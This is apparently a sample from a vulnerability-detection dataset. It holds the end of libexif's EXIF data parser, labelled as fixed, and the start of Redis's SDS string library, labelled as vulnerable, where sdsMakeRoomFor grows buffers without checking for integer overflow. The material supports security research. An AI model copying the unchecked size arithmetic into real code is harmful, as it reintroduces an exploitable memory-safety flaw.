qsort (*d + 6 + offset - (ifd->count + n_ptr + n_thumb) * 12,
(ifd->count + n_ptr + n_thumb), 12,
(data->priv->order == EXIF_BYTE_ORDER_INTEL) ? cmp_func_intel : cmp_func_motorola);
/* Correctly terminate the directory */
if (i == EXIF_IFD_0 && (data->ifd[EXIF_IFD_1]->count ||
data->size)) {
/*
* We are saving IFD 0. Tell where IFD 1 starts and save
* IFD 1.
*/
exif_set_long (*d + 6 + offset, data->priv->order, *ds - 6);
exif_data_save_data_content (data, data->ifd[EXIF_IFD_1], d, ds,
*ds - 6);
} else
exif_set_long (*d + 6 + offset, data->priv->order, 0);
}
typedef enum {
EXIF_DATA_TYPE_MAKER_NOTE_NONE = 0,
EXIF_DATA_TYPE_MAKER_NOTE_CANON = 1,
EXIF_DATA_TYPE_MAKER_NOTE_OLYMPUS = 2,
EXIF_DATA_TYPE_MAKER_NOTE_PENTAX = 3,
EXIF_DATA_TYPE_MAKER_NOTE_NIKON = 4,
EXIF_DATA_TYPE_MAKER_NOTE_CASIO = 5,
EXIF_DATA_TYPE_MAKER_NOTE_FUJI = 6
} ExifDataTypeMakerNote;
/*! If MakerNote is recognized, load it.
*
* \param[in,out] data #ExifData
* \param[in] d pointer to raw EXIF data
* \param[in] ds length of data at d
*/
static void
interpret_maker_note(ExifData *data, const unsigned char *d, unsigned int ds)
{
int mnoteid;
ExifEntry* e = exif_data_get_entry (data, EXIF_TAG_MAKER_NOTE);
if (!e)
return;
if ((mnoteid = exif_mnote_data_olympus_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Olympus MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_olympus_new (data->priv->mem);
} else if ((mnoteid = exif_mnote_data_canon_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Canon MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_canon_new (data->priv->mem, data->priv->options);
} else if ((mnoteid = exif_mnote_data_fuji_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Fuji MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_fuji_new (data->priv->mem);
/* NOTE: Must do Pentax detection last because some of the
* heuristics are pretty general. */
} else if ((mnoteid = exif_mnote_data_pentax_identify (data, e)) != 0) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG,
"ExifData", "Pentax MakerNote variant type %d", mnoteid);
data->priv->md = exif_mnote_data_pentax_new (data->priv->mem);
}
/*
* If we are able to interpret the maker note, do so.
*/
if (data->priv->md) {
exif_mnote_data_log (data->priv->md, data->priv->log);
exif_mnote_data_set_byte_order (data->priv->md,
data->priv->order);
exif_mnote_data_set_offset (data->priv->md,
data->priv->offset_mnote);
exif_mnote_data_load (data->priv->md, d, ds);
}
}
#define LOG_TOO_SMALL \
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData", \
_("Size of data too small to allow for EXIF data."));
void
exif_data_load_data (ExifData *data, const unsigned char *d_orig,
unsigned int ds)
{
unsigned int l;
ExifLong offset;
ExifShort n;
const unsigned char *d = d_orig;
unsigned int len, fullds;
if (!data || !data->priv || !d || !ds)
return;
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Parsing %i byte(s) EXIF data...\n", ds);
/*
* It can be that the data starts with the EXIF header. If it does
* not, search the EXIF marker.
*/
if (ds < 6) {
LOG_TOO_SMALL;
return;
}
if (!memcmp (d, ExifHeader, 6)) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Found EXIF header at start.");
} else {
while (ds >= 3) {
while (ds && (d[0] == 0xff)) {
d++;
ds--;
}
/* JPEG_MARKER_SOI */
if (ds && d[0] == JPEG_MARKER_SOI) {
d++;
ds--;
continue;
}
/* JPEG_MARKER_APP1 */
if (ds && d[0] == JPEG_MARKER_APP1)
break;
/* Skip irrelevant APP markers. The branch for APP1 must come before this,
otherwise this code block will cause APP1 to be skipped. This code path
is only relevant for files that are nonconformant to the EXIF
specification. For conformant files, the APP1 code path above will be
taken. */
if (ds >= 3 && d[0] >= 0xe0 && d[0] <= 0xef) { /* JPEG_MARKER_APPn */
d++;
ds--;
l = (d[0] << 8) | d[1];
if (l > ds)
return;
d += l;
ds -= l;
continue;
}
/* Unknown marker or data. Give up. */
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", _("EXIF marker not found."));
return;
}
if (ds < 3) {
LOG_TOO_SMALL;
return;
}
d++;
ds--;
len = (d[0] << 8) | d[1];
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"We have to deal with %i byte(s) of EXIF data.",
len);
d += 2;
ds -= 2;
}
/*
* Verify the exif header
* (offset 2, length 6).
*/
if (ds < 6) {
LOG_TOO_SMALL;
return;
}
if (memcmp (d, ExifHeader, 6)) {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", _("EXIF header not found."));
return;
}
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Found EXIF header.");
/* Sanity check the data length */
if (ds < 14)
return;
/* The JPEG APP1 section can be no longer than 64 KiB (including a
16-bit length), so cap the data length to protect against overflow
in future offset calculations */
fullds = ds;
if (ds > 0xfffe)
ds = 0xfffe;
/* Byte order (offset 6, length 2) */
if (!memcmp (d + 6, "II", 2))
data->priv->order = EXIF_BYTE_ORDER_INTEL;
else if (!memcmp (d + 6, "MM", 2))
data->priv->order = EXIF_BYTE_ORDER_MOTOROLA;
else {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", _("Unknown encoding."));
return;
}
/* Fixed value */
if (exif_get_short (d + 8, data->priv->order) != 0x002a)
return;
/* IFD 0 offset */
offset = exif_get_long (d + 10, data->priv->order);
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"IFD 0 at %i.", (int) offset);
/* ds is restricted to 16 bit above, so offset is restricted too, and offset+8 should not overflow. */
if (offset > ds || offset + 6 + 2 > ds)
return;
/* Parse the actual exif data (usually offset 14 from start) */
exif_data_load_data_content (data, EXIF_IFD_0, d + 6, ds - 6, offset, 0);
/* IFD 1 offset */
n = exif_get_short (d + 6 + offset, data->priv->order);
/* offset < 2<<16, n is 16 bit at most, so this op will not overflow */
if (offset + 6 + 2 + 12 * n + 4 > ds)
return;
offset = exif_get_long (d + 6 + offset + 2 + 12 * n, data->priv->order);
if (offset) {
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"IFD 1 at %i.", (int) offset);
/* Sanity check. ds is ensured to be above 6 above, offset is 16bit */
if (offset > ds - 6) {
exif_log (data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA,
"ExifData", "Bogus offset of IFD1.");
} else {
exif_data_load_data_content (data, EXIF_IFD_1, d + 6, ds - 6, offset, 0);
}
}
/*
* If we got an EXIF_TAG_MAKER_NOTE, try to interpret it. Some
* cameras use pointers in the maker note tag that point to the
* space between IFDs. Here is the only place where we have access
* to that data.
*/
interpret_maker_note(data, d, fullds);
/* Fixup tags if requested */
if (data->priv->options & EXIF_DATA_OPTION_FOLLOW_SPECIFICATION)
exif_data_fix (data);
}
void
exif_data_save_data (ExifData *data, unsigned char **d, unsigned int *ds)
{
if (ds)
*ds = 0; /* This means something went wrong */
if (!data || !d || !ds)
return;
/* Header */
*ds = 14;
*d = exif_data_alloc (data, *ds);
if (!*d) {
*ds = 0;
return;
}
memcpy (*d, ExifHeader, 6);
/* Order (offset 6) */
if (data->priv->order == EXIF_BYTE_ORDER_INTEL) {
memcpy (*d + 6, "II", 2);
} else {
memcpy (*d + 6, "MM", 2);
}
/* Fixed value (2 bytes, offset 8) */
exif_set_short (*d + 8, data->priv->order, 0x002a);
/*
* IFD 0 offset (4 bytes, offset 10).
* We will start 8 bytes after the
* EXIF header (2 bytes for order, another 2 for the test, and
* 4 bytes for the IFD 0 offset make 8 bytes together).
*/
exif_set_long (*d + 10, data->priv->order, 8);
/* Now save IFD 0. IFD 1 will be saved automatically. */
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Saving IFDs...");
exif_data_save_data_content (data, data->ifd[EXIF_IFD_0], d, ds,
*ds - 6);
exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
"Saved %i byte(s) EXIF data.", *ds);
}
ExifData *
exif_data_new_from_file (const char *path)
{
ExifData *edata;
ExifLoader *loader;
loader = exif_loader_new ();
exif_loader_write_file (loader, path);
edata = exif_loader_get_data (loader);
exif_loader_unref (loader);
return (edata);
}
void
exif_data_ref (ExifData *data)
{
if (!data)
return;
data->priv->ref_count++;
}
void
exif_data_unref (ExifData *data)
{
if (!data)
return;
data->priv->ref_count--;
if (!data->priv->ref_count)
exif_data_free (data);
}
void
exif_data_free (ExifData *data)
{
unsigned int i;
ExifMem *mem = (data && data->priv) ? data->priv->mem : NULL;
if (!data)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++) {
if (data->ifd[i]) {
exif_content_unref (data->ifd[i]);
data->ifd[i] = NULL;
}
}
if (data->data) {
exif_mem_free (mem, data->data);
data->data = NULL;
}
if (data->priv) {
if (data->priv->log) {
exif_log_unref (data->priv->log);
data->priv->log = NULL;
}
if (data->priv->md) {
exif_mnote_data_unref (data->priv->md);
data->priv->md = NULL;
}
exif_mem_free (mem, data->priv);
exif_mem_free (mem, data);
}
exif_mem_unref (mem);
}
void
exif_data_dump (ExifData *data)
{
unsigned int i;
if (!data)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++) {
if (data->ifd[i] && data->ifd[i]->count) {
printf ("Dumping IFD '%s'...\n",
exif_ifd_get_name (i));
exif_content_dump (data->ifd[i], 0);
}
}
if (data->data) {
printf ("%i byte(s) thumbnail data available: ", data->size);
if (data->size >= 4) {
printf ("0x%02x 0x%02x ... 0x%02x 0x%02x\n",
data->data[0], data->data[1],
data->data[data->size - 2],
data->data[data->size - 1]);
}
}
}
ExifByteOrder
exif_data_get_byte_order (ExifData *data)
{
if (!data)
return (0);
return (data->priv->order);
}
void
exif_data_foreach_content (ExifData *data, ExifDataForeachContentFunc func,
void *user_data)
{
unsigned int i;
if (!data || !func)
return;
for (i = 0; i < EXIF_IFD_COUNT; i++)
func (data->ifd[i], user_data);
}
typedef struct _ByteOrderChangeData ByteOrderChangeData;
struct _ByteOrderChangeData {
ExifByteOrder old, new;
};
static void
entry_set_byte_order (ExifEntry *e, void *data)
{
ByteOrderChangeData *d = data;
if (!e)
return;
exif_array_set_byte_order (e->format, e->data, e->components, d->old, d->new);
}
static void
content_set_byte_order (ExifContent *content, void *data)
{
exif_content_foreach_entry (content, entry_set_byte_order, data);
}
void
exif_data_set_byte_order (ExifData *data, ExifByteOrder order)
{
ByteOrderChangeData d;
if (!data || (order == data->priv->order))
return;
d.old = data->priv->order;
d.new = order;
exif_data_foreach_content (data, content_set_byte_order, &d);
data->priv->order = order;
if (data->priv->md)
exif_mnote_data_set_byte_order (data->priv->md, order);
}
void
exif_data_log (ExifData *data, ExifLog *log)
{
unsigned int i;
if (!data || !data->priv)
return;
exif_log_unref (data->priv->log);
data->priv->log = log;
exif_log_ref (log);
for (i = 0; i < EXIF_IFD_COUNT; i++)
exif_content_log (data->ifd[i], log);
}
/* Used internally within libexif */
ExifLog *exif_data_get_log (ExifData *);
ExifLog *
exif_data_get_log (ExifData *data)
{
if (!data || !data->priv)
return NULL;
return data->priv->log;
}
static const struct {
ExifDataOption option;
const char *name;
const char *description;
} exif_data_option[] = {
{EXIF_DATA_OPTION_IGNORE_UNKNOWN_TAGS, N_("Ignore unknown tags"),
N_("Ignore unknown tags when loading EXIF data.")},
{EXIF_DATA_OPTION_FOLLOW_SPECIFICATION, N_("Follow specification"),
N_("Add, correct and remove entries to get EXIF data that follows "
"the specification.")},
{EXIF_DATA_OPTION_DONT_CHANGE_MAKER_NOTE, N_("Do not change maker note"),
N_("When loading and resaving Exif data, save the maker note unmodified."
" Be aware that the maker note can get corrupted.")},
{0, NULL, NULL}
};
const char *
exif_data_option_get_name (ExifDataOption o)
{
unsigned int i;
for (i = 0; exif_data_option[i].name; i++)
if (exif_data_option[i].option == o)
break;
return _(exif_data_option[i].name);
}
const char *
exif_data_option_get_description (ExifDataOption o)
{
unsigned int i;
for (i = 0; exif_data_option[i].description; i++)
if (exif_data_option[i].option == o)
break;
return _(exif_data_option[i].description);
}
void
exif_data_set_option (ExifData *d, ExifDataOption o)
{
if (!d)
return;
d->priv->options |= o;
}
void
exif_data_unset_option (ExifData *d, ExifDataOption o)
{
if (!d)
return;
d->priv->options &= ~o;
}
static void
fix_func (ExifContent *c, void *UNUSED(data))
{
switch (exif_content_get_ifd (c)) {
case EXIF_IFD_1:
if (c->parent->data)
exif_content_fix (c);
else if (c->count) {
exif_log (c->parent->priv->log, EXIF_LOG_CODE_DEBUG, "exif-data",
"No thumbnail but entries on thumbnail. These entries have been "
"removed.");
while (c->count) {
unsigned int cnt = c->count;
exif_content_remove_entry (c, c->entries[c->count - 1]);
if (cnt == c->count) {
/* safety net */
exif_log (c->parent->priv->log, EXIF_LOG_CODE_DEBUG, "exif-data",
"failed to remove last entry from entries.");
c->count--;
}
}
}
break;
default:
exif_content_fix (c);
}
}
void
exif_data_fix (ExifData *d)
{
exif_data_foreach_content (d, fix_func, NULL);
}
void
exif_data_set_data_type (ExifData *d, ExifDataType dt)
{
if (!d || !d->priv)
return;
d->priv->data_type = dt;
}
ExifDataType
exif_data_get_data_type (ExifData *d)
{
return (d && d->priv) ? d->priv->data_type : EXIF_DATA_TYPE_UNKNOWN;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_1433_0 |
crossvul-cpp_data_bad_1943_1 | /* SDSLib 2.0 -- A C dynamic strings library
*
* Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
* Copyright (c) 2015, Oran Agra
* Copyright (c) 2015, Redis Labs, Inc
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of Redis nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <assert.h>
#include <limits.h>
#include "sds.h"
#include "sdsalloc.h"
const char *SDS_NOINIT = "SDS_NOINIT";
static inline int sdsHdrSize(char type) {
switch(type&SDS_TYPE_MASK) {
case SDS_TYPE_5:
return sizeof(struct sdshdr5);
case SDS_TYPE_8:
return sizeof(struct sdshdr8);
case SDS_TYPE_16:
return sizeof(struct sdshdr16);
case SDS_TYPE_32:
return sizeof(struct sdshdr32);
case SDS_TYPE_64:
return sizeof(struct sdshdr64);
}
return 0;
}
static inline char sdsReqType(size_t string_size) {
if (string_size < 1<<5)
return SDS_TYPE_5;
if (string_size < 1<<8)
return SDS_TYPE_8;
if (string_size < 1<<16)
return SDS_TYPE_16;
#if (LONG_MAX == LLONG_MAX)
if (string_size < 1ll<<32)
return SDS_TYPE_32;
return SDS_TYPE_64;
#else
return SDS_TYPE_32;
#endif
}
/* Create a new sds string with the content specified by the 'init' pointer
* and 'initlen'.
* If NULL is used for 'init' the string is initialized with zero bytes.
* If SDS_NOINIT is used, the buffer is left uninitialized;
*
* The string is always null-termined (all the sds strings are, always) so
* even if you create an sds string with:
*
* mystring = sdsnewlen("abc",3);
*
* You can print the string with printf() as there is an implicit \0 at the
* end of the string. However the string is binary safe and can contain
* \0 characters in the middle, as the length is stored in the sds header. */
sds sdsnewlen(const void *init, size_t initlen) {
void *sh;
sds s;
char type = sdsReqType(initlen);
/* Empty strings are usually created in order to append. Use type 8
* since type 5 is not good at this. */
if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8;
int hdrlen = sdsHdrSize(type);
unsigned char *fp; /* flags pointer. */
sh = s_malloc(hdrlen+initlen+1);
if (sh == NULL) return NULL;
if (init==SDS_NOINIT)
init = NULL;
else if (!init)
memset(sh, 0, hdrlen+initlen+1);
s = (char*)sh+hdrlen;
fp = ((unsigned char*)s)-1;
switch(type) {
case SDS_TYPE_5: {
*fp = type | (initlen << SDS_TYPE_BITS);
break;
}
case SDS_TYPE_8: {
SDS_HDR_VAR(8,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
case SDS_TYPE_16: {
SDS_HDR_VAR(16,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
case SDS_TYPE_32: {
SDS_HDR_VAR(32,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
case SDS_TYPE_64: {
SDS_HDR_VAR(64,s);
sh->len = initlen;
sh->alloc = initlen;
*fp = type;
break;
}
}
if (initlen && init)
memcpy(s, init, initlen);
s[initlen] = '\0';
return s;
}
/* Create an empty (zero length) sds string. Even in this case the string
* always has an implicit null term. */
sds sdsempty(void) {
return sdsnewlen("",0);
}
/* Create a new sds string starting from a null terminated C string. */
sds sdsnew(const char *init) {
size_t initlen = (init == NULL) ? 0 : strlen(init);
return sdsnewlen(init, initlen);
}
/* Duplicate an sds string. */
sds sdsdup(const sds s) {
return sdsnewlen(s, sdslen(s));
}
/* Free an sds string. No operation is performed if 's' is NULL. */
void sdsfree(sds s) {
if (s == NULL) return;
s_free((char*)s-sdsHdrSize(s[-1]));
}
/* Set the sds string length to the length as obtained with strlen(), so
* considering as content only up to the first null term character.
*
* This function is useful when the sds string is hacked manually in some
* way, like in the following example:
*
* s = sdsnew("foobar");
* s[2] = '\0';
* sdsupdatelen(s);
* printf("%d\n", sdslen(s));
*
* The output will be "2", but if we comment out the call to sdsupdatelen()
* the output will be "6" as the string was modified but the logical length
* remains 6 bytes. */
void sdsupdatelen(sds s) {
size_t reallen = strlen(s);
sdssetlen(s, reallen);
}
/* Modify an sds string in-place to make it empty (zero length).
* However all the existing buffer is not discarded but set as free space
* so that next append operations will not require allocations up to the
* number of bytes previously available. */
void sdsclear(sds s) {
sdssetlen(s, 0);
s[0] = '\0';
}
/* Enlarge the free space at the end of the sds string so that the caller
* is sure that after calling this function can overwrite up to addlen
* bytes after the end of the string, plus one more byte for nul term.
*
* Note: this does not change the *length* of the sds string as returned
* by sdslen(), but only the free buffer space we have. */
sds sdsMakeRoomFor(sds s, size_t addlen) {
void *sh, *newsh;
size_t avail = sdsavail(s);
size_t len, newlen;
char type, oldtype = s[-1] & SDS_TYPE_MASK;
int hdrlen;
/* Return ASAP if there is enough space left. */
if (avail >= addlen) return s;
len = sdslen(s);
sh = (char*)s-sdsHdrSize(oldtype);
newlen = (len+addlen);
if (newlen < SDS_MAX_PREALLOC)
newlen *= 2;
else
newlen += SDS_MAX_PREALLOC;
type = sdsReqType(newlen);
/* Don't use type 5: the user is appending to the string and type 5 is
* not able to remember empty space, so sdsMakeRoomFor() must be called
* at every appending operation. */
if (type == SDS_TYPE_5) type = SDS_TYPE_8;
hdrlen = sdsHdrSize(type);
if (oldtype==type) {
newsh = s_realloc(sh, hdrlen+newlen+1);
if (newsh == NULL) return NULL;
s = (char*)newsh+hdrlen;
} else {
/* Since the header size changes, need to move the string forward,
* and can't use realloc */
newsh = s_malloc(hdrlen+newlen+1);
if (newsh == NULL) return NULL;
memcpy((char*)newsh+hdrlen, s, len+1);
s_free(sh);
s = (char*)newsh+hdrlen;
s[-1] = type;
sdssetlen(s, len);
}
sdssetalloc(s, newlen);
return s;
}
/* Reallocate the sds string so that it has no free space at the end. The
* contained string remains not altered, but next concatenation operations
* will require a reallocation.
*
* After the call, the passed sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdsRemoveFreeSpace(sds s) {
void *sh, *newsh;
char type, oldtype = s[-1] & SDS_TYPE_MASK;
int hdrlen, oldhdrlen = sdsHdrSize(oldtype);
size_t len = sdslen(s);
size_t avail = sdsavail(s);
sh = (char*)s-oldhdrlen;
/* Return ASAP if there is no space left. */
if (avail == 0) return s;
/* Check what would be the minimum SDS header that is just good enough to
* fit this string. */
type = sdsReqType(len);
hdrlen = sdsHdrSize(type);
/* If the type is the same, or at least a large enough type is still
* required, we just realloc(), letting the allocator to do the copy
* only if really needed. Otherwise if the change is huge, we manually
* reallocate the string to use the different header type. */
if (oldtype==type || type > SDS_TYPE_8) {
newsh = s_realloc(sh, oldhdrlen+len+1);
if (newsh == NULL) return NULL;
s = (char*)newsh+oldhdrlen;
} else {
newsh = s_malloc(hdrlen+len+1);
if (newsh == NULL) return NULL;
memcpy((char*)newsh+hdrlen, s, len+1);
s_free(sh);
s = (char*)newsh+hdrlen;
s[-1] = type;
sdssetlen(s, len);
}
sdssetalloc(s, len);
return s;
}
/* Return the total size of the allocation of the specified sds string,
* including:
* 1) The sds header before the pointer.
* 2) The string.
* 3) The free buffer at the end if any.
* 4) The implicit null term.
*/
size_t sdsAllocSize(sds s) {
size_t alloc = sdsalloc(s);
return sdsHdrSize(s[-1])+alloc+1;
}
/* Return the pointer of the actual SDS allocation (normally SDS strings
* are referenced by the start of the string buffer). */
void *sdsAllocPtr(sds s) {
return (void*) (s-sdsHdrSize(s[-1]));
}
/* Increment the sds length and decrements the left free space at the
* end of the string according to 'incr'. Also set the null term
* in the new end of the string.
*
* This function is used in order to fix the string length after the
* user calls sdsMakeRoomFor(), writes something after the end of
* the current string, and finally needs to set the new length.
*
* Note: it is possible to use a negative increment in order to
* right-trim the string.
*
* Usage example:
*
* Using sdsIncrLen() and sdsMakeRoomFor() it is possible to mount the
* following schema, to cat bytes coming from the kernel to the end of an
* sds string without copying into an intermediate buffer:
*
* oldlen = sdslen(s);
* s = sdsMakeRoomFor(s, BUFFER_SIZE);
* nread = read(fd, s+oldlen, BUFFER_SIZE);
* ... check for nread <= 0 and handle it ...
* sdsIncrLen(s, nread);
*/
void sdsIncrLen(sds s, ssize_t incr) {
unsigned char flags = s[-1];
size_t len;
switch(flags&SDS_TYPE_MASK) {
case SDS_TYPE_5: {
unsigned char *fp = ((unsigned char*)s)-1;
unsigned char oldlen = SDS_TYPE_5_LEN(flags);
assert((incr > 0 && oldlen+incr < 32) || (incr < 0 && oldlen >= (unsigned int)(-incr)));
*fp = SDS_TYPE_5 | ((oldlen+incr) << SDS_TYPE_BITS);
len = oldlen+incr;
break;
}
case SDS_TYPE_8: {
SDS_HDR_VAR(8,s);
assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
len = (sh->len += incr);
break;
}
case SDS_TYPE_16: {
SDS_HDR_VAR(16,s);
assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
len = (sh->len += incr);
break;
}
case SDS_TYPE_32: {
SDS_HDR_VAR(32,s);
assert((incr >= 0 && sh->alloc-sh->len >= (unsigned int)incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
len = (sh->len += incr);
break;
}
case SDS_TYPE_64: {
SDS_HDR_VAR(64,s);
assert((incr >= 0 && sh->alloc-sh->len >= (uint64_t)incr) || (incr < 0 && sh->len >= (uint64_t)(-incr)));
len = (sh->len += incr);
break;
}
default: len = 0; /* Just to avoid compilation warnings. */
}
s[len] = '\0';
}
/* Grow the sds to have the specified length. Bytes that were not part of
* the original length of the sds will be set to zero.
*
* if the specified length is smaller than the current length, no operation
* is performed. */
sds sdsgrowzero(sds s, size_t len) {
size_t curlen = sdslen(s);
if (len <= curlen) return s;
s = sdsMakeRoomFor(s,len-curlen);
if (s == NULL) return NULL;
/* Make sure added region doesn't contain garbage */
memset(s+curlen,0,(len-curlen+1)); /* also set trailing \0 byte */
sdssetlen(s, len);
return s;
}
/* Append the specified binary-safe string pointed by 't' of 'len' bytes to the
* end of the specified sds string 's'.
*
* After the call, the passed sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscatlen(sds s, const void *t, size_t len) {
size_t curlen = sdslen(s);
s = sdsMakeRoomFor(s,len);
if (s == NULL) return NULL;
memcpy(s+curlen, t, len);
sdssetlen(s, curlen+len);
s[curlen+len] = '\0';
return s;
}
/* Append the specified null terminated C string to the sds string 's'.
*
* After the call, the passed sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscat(sds s, const char *t) {
return sdscatlen(s, t, strlen(t));
}
/* Append the specified sds 't' to the existing sds 's'.
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call. */
sds sdscatsds(sds s, const sds t) {
return sdscatlen(s, t, sdslen(t));
}
/* Destructively modify the sds string 's' to hold the specified binary
* safe string pointed by 't' of length 'len' bytes. */
sds sdscpylen(sds s, const char *t, size_t len) {
if (sdsalloc(s) < len) {
s = sdsMakeRoomFor(s,len-sdslen(s));
if (s == NULL) return NULL;
}
memcpy(s, t, len);
s[len] = '\0';
sdssetlen(s, len);
return s;
}
/* Like sdscpylen() but 't' must be a null-termined string so that the length
* of the string is obtained with strlen(). */
sds sdscpy(sds s, const char *t) {
return sdscpylen(s, t, strlen(t));
}
/* Helper for sdscatlonglong() doing the actual number -> string
* conversion. 's' must point to a string with room for at least
* SDS_LLSTR_SIZE bytes.
*
* The function returns the length of the null-terminated string
* representation stored at 's'. */
#define SDS_LLSTR_SIZE 21
int sdsll2str(char *s, long long value) {
char *p, aux;
unsigned long long v;
size_t l;
/* Generate the string representation, this method produces
* a reversed string. */
v = (value < 0) ? -value : value;
p = s;
do {
*p++ = '0'+(v%10);
v /= 10;
} while(v);
if (value < 0) *p++ = '-';
/* Compute length and add null term. */
l = p-s;
*p = '\0';
/* Reverse the string. */
p--;
while(s < p) {
aux = *s;
*s = *p;
*p = aux;
s++;
p--;
}
return l;
}
/* Identical sdsll2str(), but for unsigned long long type. */
int sdsull2str(char *s, unsigned long long v) {
char *p, aux;
size_t l;
/* Generate the string representation, this method produces
* a reversed string. */
p = s;
do {
*p++ = '0'+(v%10);
v /= 10;
} while(v);
/* Compute length and add null term. */
l = p-s;
*p = '\0';
/* Reverse the string. */
p--;
while(s < p) {
aux = *s;
*s = *p;
*p = aux;
s++;
p--;
}
return l;
}
/* Create an sds string from a long long value. It is much faster than:
*
* sdscatprintf(sdsempty(),"%lld\n", value);
*/
sds sdsfromlonglong(long long value) {
char buf[SDS_LLSTR_SIZE];
int len = sdsll2str(buf,value);
return sdsnewlen(buf,len);
}
/* Like sdscatprintf() but gets va_list instead of being variadic. */
sds sdscatvprintf(sds s, const char *fmt, va_list ap) {
va_list cpy;
char staticbuf[1024], *buf = staticbuf, *t;
size_t buflen = strlen(fmt)*2;
int bufstrlen;
/* We try to start using a static buffer for speed.
* If not possible we revert to heap allocation. */
if (buflen > sizeof(staticbuf)) {
buf = s_malloc(buflen);
if (buf == NULL) return NULL;
} else {
buflen = sizeof(staticbuf);
}
/* Alloc enough space for buffer and \0 after failing to
* fit the string in the current buffer size. */
while(1) {
va_copy(cpy,ap);
bufstrlen = vsnprintf(buf, buflen, fmt, cpy);
va_end(cpy);
if (bufstrlen < 0) {
if (buf != staticbuf) s_free(buf);
return NULL;
}
if (((size_t)bufstrlen) >= buflen) {
if (buf != staticbuf) s_free(buf);
buflen = ((size_t)bufstrlen) + 1;
buf = s_malloc(buflen);
if (buf == NULL) return NULL;
continue;
}
break;
}
/* Finally concat the obtained string to the SDS string and return it. */
t = sdscatlen(s, buf, bufstrlen);
if (buf != staticbuf) s_free(buf);
return t;
}
/* Append to the sds string 's' a string obtained using printf-alike format
* specifier.
*
* After the call, the modified sds string is no longer valid and all the
* references must be substituted with the new pointer returned by the call.
*
* Example:
*
* s = sdsnew("Sum is: ");
* s = sdscatprintf(s,"%d+%d = %d",a,b,a+b).
*
* Often you need to create a string from scratch with the printf-alike
* format. When this is the need, just use sdsempty() as the target string:
*
* s = sdscatprintf(sdsempty(), "... your format ...", args);
*/
sds sdscatprintf(sds s, const char *fmt, ...) {
va_list ap;
char *t;
va_start(ap, fmt);
t = sdscatvprintf(s,fmt,ap);
va_end(ap);
return t;
}
/* This function is similar to sdscatprintf, but much faster as it does
* not rely on sprintf() family functions implemented by the libc that
* are often very slow. Moreover directly handling the sds string as
* new data is concatenated provides a performance improvement.
*
* However this function only handles an incompatible subset of printf-alike
* format specifiers:
*
* %s - C String
* %S - SDS string
* %i - signed int
* %I - 64 bit signed integer (long long, int64_t)
* %u - unsigned int
* %U - 64 bit unsigned integer (unsigned long long, uint64_t)
